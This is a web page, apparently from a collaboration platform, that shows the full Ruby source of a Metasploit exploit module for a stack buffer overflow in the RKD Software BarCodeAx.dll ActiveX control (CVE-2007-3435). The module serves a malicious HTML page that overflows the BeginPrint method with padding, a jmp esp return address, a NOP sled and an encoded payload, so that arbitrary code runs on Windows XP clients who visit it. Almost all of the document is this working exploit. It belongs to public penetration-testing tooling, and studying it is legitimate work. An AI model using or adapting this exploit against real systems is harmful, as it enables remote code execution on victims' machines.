Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack buffer overflow in RKD Software Barcode Application
16
        ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint
17
        method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.
18
      },
19
      'License'        => MSF_LICENSE,
20
      'Author'         => [ 'Trancek <trancek[at]yashira.org>', 'aushack' ],
21
      'References'     =>
22
        [
23
          [ 'EDB', '4094' ],
24
          [ 'OSVDB', '37482' ],
25
          [ 'BID', '24596' ],
26
          [ 'CVE', '2007-3435' ],
27
        ],
28
      'DefaultOptions' =>
29
        {
30
          'EXITFUNC' => 'process',
31
        },
32
      'Payload'        =>
33
        {
34
          'Space'         => 1024,
35
          'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",
36
          'StackAdjustment' => -3500,
37
        },
38
      'Platform'       => 'win',
39
      'Targets'        =>
40
        [
41
          [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll aushack xpsp0
42
        ],
43
      'DisclosureDate' => '2007-06-22',
44
      'DefaultTarget'  => 0))
45
  end
46

47
  def autofilter
48
    false
49
  end
50

51
  def check_dependencies
52
    use_zlib
53
  end
54

55
  def on_request_uri(cli, request)
56
    # Re-generate the payload
57
    return if ((p = regenerate_payload(cli)) == nil)
58

59
    # Randomize some things
60
    vname = rand_text_alpha(rand(100) + 1)
61

62
    buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded
63

64
    # Build out the message
65
    content = %Q|<html>
66
<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='#{vname}'></object>
67
<script language='javascript'>
68
#{vname}.BeginPrint("#{buff}");
69
</script>
70
</html>
71
|
72

73
    print_status("Sending #{self.name}")
74

75
    # Transmit the response to the client
76
    send_response_html(cli, content)
77

78
    # Handle the payload
79
    handler(cli)
80
  end
81
end
82

83